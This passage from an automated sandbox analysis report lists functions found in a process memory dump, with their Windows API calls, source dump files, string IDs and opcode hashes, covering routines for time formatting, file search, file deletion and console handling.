                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F0C5F2: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 00F0C6C7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F0C5F2: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 00F0C6E6
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F0C5F2: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 00F0C72A
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 223857506-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: e58bf4291eca39b92cf50feba3312a2ab891ae505b5fd16d3b042588f809e9e2
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: a91c8e15f3bd3cc8745561130300722545752597133d1a03f936960bf30ae6e8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e58bf4291eca39b92cf50feba3312a2ab891ae505b5fd16d3b042588f809e9e2
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6351B275A10209AFDB24DFB4CC05ABFB7B8EF48314B144269E902E7291E734DD01EBA0
                                                                                                                                                                                                                                                                                                                                                      Function 00EE9310 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 249timeCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00F0E590,?,00002000), ref: 00EE9342
                                                                                                                                                                                                                                                                                                                                                      • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00EE9356
                                                                                                                                                                                                                                                                                                                                                      • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00EE936A
                                                                                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00EE937E
                                                                                                                                                                                                                                                                                                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 00EFBC07
                                                                                                                                                                                                                                                                                                                                                      • GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 00EFBD31
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                                                                                                                                                                                                                                                                      • String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 55602301-2516506544
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: ca4e3c9cc20daf42a36f6a9ea586d8b8678a10d855d5b5e832a064bdd082f085
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3409bdf28c3d5ebd1fd4697292df077c1fcea93c4b163e725499370c671edb70
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca4e3c9cc20daf42a36f6a9ea586d8b8678a10d855d5b5e832a064bdd082f085
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE81D476A0021D9BCF249F65CC45AFAB3B9AF84304F4451AAE609F7150EB319E82CB51
                                                                                                                                                                                                                                                                                                                                                      Function 00EF589A Relevance: 15.1, APIs: 10, Instructions: 106memoryfileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,00EF59D0,?,00EE6054,-00001038,00000000,?,?), ref: 00EF58BB
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00EF58CD
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00EF5944
                                                                                                                                                                                                                                                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00EF594B
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00EF596C
                                                                                                                                                                                                                                                                                                                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00EF5973
                                                                                                                                                                                                                                                                                                                                                      • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00EF598F
                                                                                                                                                                                                                                                                                                                                                      • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00EF59B6
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00F0160B
                                                                                                                                                                                                                                                                                                                                                      • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00F01618
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FindHeap$AllocCloseErrorFileLastProcess$FirstNext
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3609286125-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: b7d4d503b502ef1c7d11773e04e34902e12a7b9b3f99f0f71c80b1203dcf5137
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ca041f80386bd5a4f08236fbaee4b9f74a4770f334829059a88d404036d57e9a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7d4d503b502ef1c7d11773e04e34902e12a7b9b3f99f0f71c80b1203dcf5137
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B031A33220160CDFDB288F64DC09AB93BA5EB95335F255518E7A6D32E0DB719801FB11
                                                                                                                                                                                                                                                                                                                                                      Function 00EF4759 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 81filenativeCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL(?,?,00000000,?), ref: 00EF4782
                                                                                                                                                                                                                                                                                                                                                      • NtOpenFile.NTDLL ref: 00EF47D4
                                                                                                                                                                                                                                                                                                                                                      • RtlReleaseRelativeName.NTDLL(?), ref: 00EF47E0
                                                                                                                                                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(?), ref: 00EF47EA
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF4823: NtQueryVolumeInformationFile.NTDLL(000000FF,?,?,00000008,00000004), ref: 00EF484F
                                                                                                                                                                                                                                                                                                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 00EF480E
                                                                                                                                                                                                                                                                                                                                                      • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000001), ref: 00F0096F
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F0097D
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: File$NamePathRelative$CloseDeleteErrorFreeHandleInformationLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2968197161-2766056989
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 702fe94e7d8b1d4337962082c5bc5e95cf1a9f470296b4f29931612f5f24b514
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: cd6101d96e31b6671f580936e676eec9f5435417e5e840dea0f206b2660dd934
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 702fe94e7d8b1d4337962082c5bc5e95cf1a9f470296b4f29931612f5f24b514
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 812162B5D0020DAFDB20DFA5D944AEEB7B8EB44760F104165FA02F3291DB749E05AB60
                                                                                                                                                                                                                                                                                                                                                      Function 00F07460 Relevance: 13.6, APIs: 9, Instructions: 66filenativeCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00F07483
                                                                                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00F07495
                                                                                                                                                                                                                                                                                                                                                      • fprintf.MSVCRT ref: 00F074BB
                                                                                                                                                                                                                                                                                                                                                      • fflush.MSVCRT ref: 00F074C9
                                                                                                                                                                                                                                                                                                                                                      • TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00F074E2
                                                                                                                                                                                                                                                                                                                                                      • NtCancelSynchronousIoFile.NTDLL ref: 00F074F8
                                                                                                                                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00F074FF
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00F0751C
                                                                                                                                                                                                                                                                                                                                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00F07524
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3139166086-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 17b13d97ae0f1a81b21df46891efdcb4fa6a77d017c8be6fcf94c7d9303f1aa1
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: afc472ea18ad73da6a01503e03b8c4a76a7e27d90b19ade2249b30df676aa4d2
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17b13d97ae0f1a81b21df46891efdcb4fa6a77d017c8be6fcf94c7d9303f1aa1
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2511D330D08308EFDB217B60EC0EBB97B69EF04765F084058F501950F1E7B59952FA62
                                                                                                                                                                                                                                                                                                                                                      Function 00EE4E3B Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _setjmp3.MSVCRT ref: 00EE4E78
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00F28BF0,00000000,?), ref: 00EE8EC3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                      • NtQueryInformationProcess.NTDLL ref: 00EE4F28
                                                                                                                                                                                                                                                                                                                                                      • NtSetInformationProcess.NTDLL ref: 00EE4F46
                                                                                                                                                                                                                                                                                                                                                      • NtSetInformationProcess.NTDLL ref: 00EE4FAE
                                                                                                                                                                                                                                                                                                                                                      • longjmp.MSVCRT(00F20A30,00000001,00000000), ref: 00EF91C8
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: %9d$P,gw
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4212706909-1357659787
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a6e642c1c3205e24b8b58e519b009b9e473229d69e58b0ccd8fd01bd348da890
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: e764fa7961cd7ecd82df3d9f3cb6a39b7ef9e0fc1a793ce4c3049223a5ef5c6e
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a6e642c1c3205e24b8b58e519b009b9e473229d69e58b0ccd8fd01bd348da890
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 754128B0E0535CAFD710DF6A9C05BAABBF4EB44714F11511AE610E72E1DBB08901EB91
                                                                                                                                                                                                                                                                                                                                                      Function 00EF4875 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 376COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1D90: _wcsnicmp.MSVCRT ref: 00EF1E14
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF4BAF: _wcsnicmp.MSVCRT ref: 00EF4C1A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF4BAF: _wcsnicmp.MSVCRT ref: 00F00B39
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF4975
                                                                                                                                                                                                                                                                                                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00000000,00000001), ref: 00EF4ABC
                                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00EF4AF4
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00EF4AFF
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00000000), ref: 00EF4B28
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
                                                                                                                                                                                                                                                                                                                                                      • String ID: COPYCMD
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1068965577-3727491224
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: c60334e7e8fd3a28074514e79adadeb1afb5b934d14b9d76b231256577b16a84
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0d2d0c2d7f2f8546ea496431cd7a326e00d037a95d6abc09815e81f95c8aeccd
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c60334e7e8fd3a28074514e79adadeb1afb5b934d14b9d76b231256577b16a84
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98D1D475B0021A8BCB28DF68C895BBBB3F1EF98314F554569D90AE72C1EA34ED41DB40
                                                                                                                                                                                                                                                                                                                                                      Function 00EE7A34 Relevance: 9.3, APIs: 6, Instructions: 338COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EE7A9C
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EE7AC7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00EE7BCA
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00EE7BDC
                                                                                                                                                                                                                                                                                                                                                      • longjmp.MSVCRT(00F20A30,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 00EFAE5B
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$Heap$AllocProcesslongjmp
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2656838167-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: db2481512ab6660f92ded46b8647500035777118fa67d3111d0cd5f946ee2fc7
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 18c210cf8b68ac5fec0e852438738b775a3f095eda791faaa1fac110e98f23cc
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db2481512ab6660f92ded46b8647500035777118fa67d3111d0cd5f946ee2fc7
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8D1E5B090425D9BCB28DF25C8917BAF7B5BF04304F1860ADD64AB7681E770AE81CB95
                                                                                                                                                                                                                                                                                                                                                      Function 00EE6E57 Relevance: 9.3, APIs: 6, Instructions: 326COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3168844106-0
